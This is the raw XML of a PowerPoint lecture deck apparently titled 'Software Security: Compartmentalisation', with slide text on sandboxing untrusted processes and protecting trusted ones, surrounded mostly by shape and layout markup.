          <a:spcPct val="11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defTabSz="492125" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="11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defTabSz="492125" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="11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defTabSz="492125" rtl="0" eaLnBrk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492125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92125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92125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92125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0.jpe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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.jpeg"/><Relationship Id="rId9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5.jpe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7.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.jpeg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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34.png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F4FD4E17-4B56-DC80-443B-6C27281E3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01625"/>
            <a:ext cx="9070975" cy="64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Software Security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Compartmentalisation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="32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Erik Poll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2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DA3D9D36-DF4C-D9D7-AEA7-5513F6ED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6372225"/>
            <a:ext cx="36433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Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E8EB262-9E56-91BF-6821-750613F5E2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930B4E68-2A73-4D40-85B1-BCC38B71DC4B}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2A19FA2-AD0C-8AE0-38BF-95C19D0DE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Two use cases for compartments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10243" name="Tijdelijke aanduiding voor inhoud 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{262AC61C-8333-A3D4-A9D0-EEA030E4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116013"/>
            <a:ext cx="8642350" cy="5640387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GB" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Compartmentalisation is good to isolate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>different trust levels</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US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GB" altLang="en-US" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contain a untrusted process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from attacking others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</a:rPr>
              <a:t>aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sandboxing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marL="457200" lvl="1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en-US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GB" altLang="en-US" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protect a trusted process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0"/>
              <a:t>from outside attacks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endParaRPr lang="en-GB" altLang="en-US" sz="8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endParaRPr lang="en-GB" altLang="en-US" sz="12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endParaRPr lang="en-GB" altLang="en-US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Here, it makes sense to                                                                                             apply it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>recursively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GB" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2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GB" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11268" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7155FA2E-7FED-1458-80D8-42DE4B60AE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806831F3-8869-4B56-897B-9F008C073975}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" alt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BB2A958B-7579-A4A2-5D43-2CEADA4585A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5592763" y="3770313"/>
            <a:ext cx="1998662" cy="1204912"/>
            <a:chOff x="4503917" y="3860230"/>
            <a:chExt cx="1999151" cy="1205154"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="11297" name="Groep 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEF31DC3-F537-024D-BC7B-DBA80C19C5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8186" y="3860230"/>
              <a:ext cx="801428" cy="849359"/>
              <a:chOff x="1295896" y="2277790"/>
              <a:chExt cx="1234540" cy="1525073"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="11301" name="Groep 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F42E51F6-F928-F48F-41E4-596B8EDCE9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5896" y="2280132"/>
                <a:ext cx="1213119" cy="1381381"/>
                <a:chOff x="3475881" y="1466437"/>
                <a:chExt cx="2059661" cy="1758675"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="11305" name="Rectangle 8">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE4DE779-0EFF-C101-BAB3-1C9F6A934C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17056" y="1466437"/>
                  <a:ext cx="318486" cy="1746425"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:pr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nl-NL" altLang="nl-NL"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="11306" name="Rectangle 7">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABE65B1F-C6DA-99F5-050C-0B6BC86A2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5881" y="1478687"/>
                  <a:ext cx="318486" cy="1746425"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:pr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nl-NL" altLang="nl-NL"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11302" name="Freeform 56">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D525BC31-669E-D5A3-6D60-34FB57509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974" y="2721058"/>
                <a:ext cx="131563" cy="784587"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 212770"/>
                  <a:gd name="T1" fmla="*/ 0 h 534572"/>
                  <a:gd name="T2" fmla="*/ 0 w 212770"/>
                  <a:gd name="T3" fmla="*/ 6296752 h 534572"/>
                  <a:gd name="T4" fmla="*/ 0 w 212770"/>
                  <a:gd name="T5" fmla="*/ 9969002 h 534572"/>
                  <a:gd name="T6" fmla="*/ 0 w 212770"/>
                  <a:gd name="T7" fmla="*/ 15739485 h 534572"/>
                  <a:gd name="T8" fmla="*/ 0 w 212770"/>
                  <a:gd name="T9" fmla="*/ 19935609 h 5345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770" h="534572">
                    <a:moveTo>
                      <a:pt x="57291" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="139352" y="62132"/>
                      <a:pt x="221414" y="124264"/>
                      <a:pt x="212036" y="168812"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="202658" y="213360"/>
                      <a:pt x="15088" y="225083"/>
                      <a:pt x="1020" y="267286"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="-13048" y="309489"/>
                      <a:pt x="122941" y="377484"/>
                      <a:pt x="127630" y="422031"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132319" y="466578"/>
                      <a:pt x="5710" y="525194"/>
                      <a:pt x="29156" y="534572"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:cu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11303" name="Afbeelding 33">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{325CC782-9B2D-14EA-C9E6-84F6EEDFAE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8471" y="2277790"/>
                <a:ext cx="424015" cy="435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04" name="Content Placeholder 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CE38CAC-09BB-7263-28DA-5AC2673242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80" t="20293" r="-2" b="2"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1295896" y="3635821"/>
                <a:ext cx="1234540" cy="167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98" name="Freeform 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AEC9D11-A701-FF23-92AC-F230192FD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531" y="3921758"/>
              <a:ext cx="93395" cy="747704"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 212770"/>
                <a:gd name="T1" fmla="*/ 0 h 534572"/>
                <a:gd name="T2" fmla="*/ 0 w 212770"/>
                <a:gd name="T3" fmla="*/ 3829287 h 534572"/>
                <a:gd name="T4" fmla="*/ 0 w 212770"/>
                <a:gd name="T5" fmla="*/ 6062559 h 534572"/>
                <a:gd name="T6" fmla="*/ 0 w 212770"/>
                <a:gd name="T7" fmla="*/ 9572827 h 534572"/>
                <a:gd name="T8" fmla="*/ 0 w 212770"/>
                <a:gd name="T9" fmla="*/ 12125988 h 5345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770" h="534572">
                  <a:moveTo>
                    <a:pt x="57291" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="139352" y="62132"/>
                    <a:pt x="221414" y="124264"/>
                    <a:pt x="212036" y="168812"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202658" y="213360"/>
                    <a:pt x="15088" y="225083"/>
                    <a:pt x="1020" y="267286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-13048" y="309489"/>
                    <a:pt x="122941" y="377484"/>
                    <a:pt x="127630" y="422031"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132319" y="466578"/>
                    <a:pt x="5710" y="525194"/>
                    <a:pt x="29156" y="534572"/>
                  </a:cubicBez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99" name="Rechthoek 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{191B464B-D41F-B9AC-963B-259E4AD5D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917" y="4757742"/>
              <a:ext cx="1999151" cy="307642"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="92D050"/>
            </a:solidFill>
            <a:ln w="19050" algn="ctr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600">
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>“platform”</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11300" name="Freeform 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9705911C-31E4-F7DE-9B9D-822CAB2E6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393" y="3961886"/>
              <a:ext cx="93395" cy="747704"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 212770"/>
                <a:gd name="T1" fmla="*/ 0 h 534572"/>
                <a:gd name="T2" fmla="*/ 0 w 212770"/>
                <a:gd name="T3" fmla="*/ 3829287 h 534572"/>
                <a:gd name="T4" fmla="*/ 0 w 212770"/>
                <a:gd name="T5" fmla="*/ 6062559 h 534572"/>
                <a:gd name="T6" fmla="*/ 0 w 212770"/>
                <a:gd name="T7" fmla="*/ 9572827 h 534572"/>
                <a:gd name="T8" fmla="*/ 0 w 212770"/>
                <a:gd name="T9" fmla="*/ 12125988 h 5345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770" h="534572">
                  <a:moveTo>
                    <a:pt x="57291" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="139352" y="62132"/>
                    <a:pt x="221414" y="124264"/>
                    <a:pt x="212036" y="168812"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202658" y="213360"/>
                    <a:pt x="15088" y="225083"/>
                    <a:pt x="1020" y="267286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-13048" y="309489"/>
                    <a:pt x="122941" y="377484"/>
                    <a:pt x="127630" y="422031"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132319" y="466578"/>
                    <a:pt x="5710" y="525194"/>
                    <a:pt x="29156" y="534572"/>
                  </a:cubicBez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9742C73C-99B4-F6AD-95C8-380AC0FAB5DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4295775" y="1997075"/>
            <a:ext cx="2311400" cy="1243013"/>
            <a:chOff x="4296125" y="1997768"/>
            <a:chExt cx="2311786" cy="1242145"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11287" name="Rechthoek 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{405D325D-819C-DABF-E5A0-B54421EBA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125" y="2934031"/>
              <a:ext cx="2311786" cy="305882"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="92D050"/>
            </a:solidFill>
            <a:ln w="19050" algn="ctr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600">
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>“platform”</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="11288" name="Groep 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5518215E-98DF-CCF1-46A7-46791E8548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30829" y="2025697"/>
              <a:ext cx="926758" cy="843169"/>
              <a:chOff x="1295896" y="2280132"/>
              <a:chExt cx="1234540" cy="1522731"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="11292" name="Groep 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAF3F3A4-1512-0C33-0C79-659FFBE57E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5896" y="2280132"/>
                <a:ext cx="1213119" cy="1381381"/>
                <a:chOff x="3475881" y="1466437"/>
                <a:chExt cx="2059661" cy="1758675"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="11295" name="Rectangle 8">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5DD2A28-2140-DB10-A5C0-A9034C44A5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17056" y="1466437"/>
                  <a:ext cx="318486" cy="1746425"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:pr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nl-NL" altLang="nl-NL"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="11296" name="Rectangle 7">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A024561-8C06-DFAF-2C19-A38F1BC86B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5881" y="1478687"/>
                  <a:ext cx="318486" cy="1746425"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:pr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nl-NL" altLang="nl-NL"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11293" name="Freeform 56">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD1A87B7-0C0B-277E-D226-13CD48DDD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600" y="2768777"/>
                <a:ext cx="104535" cy="784587"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 212770"/>
                  <a:gd name="T1" fmla="*/ 0 h 534572"/>
                  <a:gd name="T2" fmla="*/ 0 w 212770"/>
                  <a:gd name="T3" fmla="*/ 6296752 h 534572"/>
                  <a:gd name="T4" fmla="*/ 0 w 212770"/>
                  <a:gd name="T5" fmla="*/ 9969002 h 534572"/>
                  <a:gd name="T6" fmla="*/ 0 w 212770"/>
                  <a:gd name="T7" fmla="*/ 15739485 h 534572"/>
                  <a:gd name="T8" fmla="*/ 0 w 212770"/>
                  <a:gd name="T9" fmla="*/ 19935609 h 5345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770" h="534572">
                    <a:moveTo>
                      <a:pt x="57291" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="139352" y="62132"/>
                      <a:pt x="221414" y="124264"/>
                      <a:pt x="212036" y="168812"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="202658" y="213360"/>
                      <a:pt x="15088" y="225083"/>
                      <a:pt x="1020" y="267286"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="-13048" y="309489"/>
                      <a:pt x="122941" y="377484"/>
                      <a:pt x="127630" y="422031"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132319" y="466578"/>
                      <a:pt x="5710" y="525194"/>
                      <a:pt x="29156" y="534572"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:cu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11294" name="Content Placeholder 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2ED606A-0E36-E768-1EC4-AFDA9E47E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80" t="20293" r="-2" b="2"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1295896" y="3635821"/>
                <a:ext cx="1234540" cy="167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289" name="Picture 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D25FE7BE-DCD6-9C1A-A0A8-97A9DA0B4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857" y="1997768"/>
              <a:ext cx="316703" cy="28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0" name="Freeform 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1109E307-49AE-7D25-39BD-BCA7257F7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747" y="2056284"/>
              <a:ext cx="108000" cy="743426"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 212770"/>
                <a:gd name="T1" fmla="*/ 0 h 534572"/>
                <a:gd name="T2" fmla="*/ 0 w 212770"/>
                <a:gd name="T3" fmla="*/ 3453511 h 534572"/>
                <a:gd name="T4" fmla="*/ 0 w 212770"/>
                <a:gd name="T5" fmla="*/ 5467460 h 534572"/>
                <a:gd name="T6" fmla="*/ 0 w 212770"/>
                <a:gd name="T7" fmla="*/ 8633298 h 534572"/>
                <a:gd name="T8" fmla="*/ 0 w 212770"/>
                <a:gd name="T9" fmla="*/ 10936091 h 5345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770" h="534572">
                  <a:moveTo>
                    <a:pt x="57291" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="139352" y="62132"/>
                    <a:pt x="221414" y="124264"/>
                    <a:pt x="212036" y="168812"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202658" y="213360"/>
                    <a:pt x="15088" y="225083"/>
                    <a:pt x="1020" y="267286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-13048" y="309489"/>
                    <a:pt x="122941" y="377484"/>
                    <a:pt x="127630" y="422031"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132319" y="466578"/>
                    <a:pt x="5710" y="525194"/>
                    <a:pt x="29156" y="534572"/>
                  </a:cubicBez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91" name="Freeform 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A8D7B8D-3FB9-A981-5325-07321AEEA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937" y="2072244"/>
              <a:ext cx="42325" cy="743426"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 212770"/>
                <a:gd name="T1" fmla="*/ 0 h 534572"/>
                <a:gd name="T2" fmla="*/ 0 w 212770"/>
                <a:gd name="T3" fmla="*/ 3453511 h 534572"/>
                <a:gd name="T4" fmla="*/ 0 w 212770"/>
                <a:gd name="T5" fmla="*/ 5467460 h 534572"/>
                <a:gd name="T6" fmla="*/ 0 w 212770"/>
                <a:gd name="T7" fmla="*/ 8633298 h 534572"/>
                <a:gd name="T8" fmla="*/ 0 w 212770"/>
                <a:gd name="T9" fmla="*/ 10936091 h 5345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770" h="534572">
                  <a:moveTo>
                    <a:pt x="57291" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="139352" y="62132"/>
                    <a:pt x="221414" y="124264"/>
                    <a:pt x="212036" y="168812"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202658" y="213360"/>
                    <a:pt x="15088" y="225083"/>
                    <a:pt x="1020" y="267286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-13048" y="309489"/>
                    <a:pt x="122941" y="377484"/>
                    <a:pt x="127630" y="422031"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132319" y="466578"/>
                    <a:pt x="5710" y="525194"/>
                    <a:pt x="29156" y="534572"/>
                  </a:cubicBez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9933B561-E61C-4088-1A48-B29691E8B039}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4683125" y="5335588"/>
            <a:ext cx="2751138" cy="1752600"/>
            <a:chOff x="4761058" y="5317418"/>
            <a:chExt cx="2751024" cy="1752549"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="11274" name="Groep 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF736835-A257-2E82-13E0-1714FF608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1058" y="5317418"/>
              <a:ext cx="2743355" cy="1752549"/>
              <a:chOff x="4761058" y="5317418"/>
              <a:chExt cx="2743355" cy="1752549"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11285" name="Rectangle 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48D5C5BA-DA2F-110B-967A-895BDBE34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4568" y="5317418"/>
                <a:ext cx="159845" cy="171233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nl-NL" altLang="nl-NL"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11286" name="Rectangle 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDDDAB6F-37E8-4310-46BB-F6D06BAF8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1058" y="5357630"/>
                <a:ext cx="160714" cy="171233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nl-NL" altLang="nl-NL"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11275" name="Content Placeholder 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ECD85B0-4E66-D95F-357E-18B8E5C2A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0" t="20293" r="-2" b="2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4768729" y="6890721"/>
              <a:ext cx="2743353" cy="1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1276" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F7902CE-5CC7-0F23-3E9A-D25B1EEF6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602" y="5418952"/>
              <a:ext cx="121775" cy="76397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/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11277" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A9E741D-4AC3-B4A3-1EF5-00209AE3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456" y="5418952"/>
              <a:ext cx="121775" cy="76397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/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11278" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{851F2266-4574-389B-AD2D-5A8AE84EC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7024" y="5928456"/>
              <a:ext cx="121775" cy="76397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/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11279" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE97E98C-6BA2-00C4-0F84-FF36FEFD5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6248" y="5936312"/>
              <a:ext cx="121775" cy="76397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/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11280" name="Content Placeholder 1">
              <a:extLst>
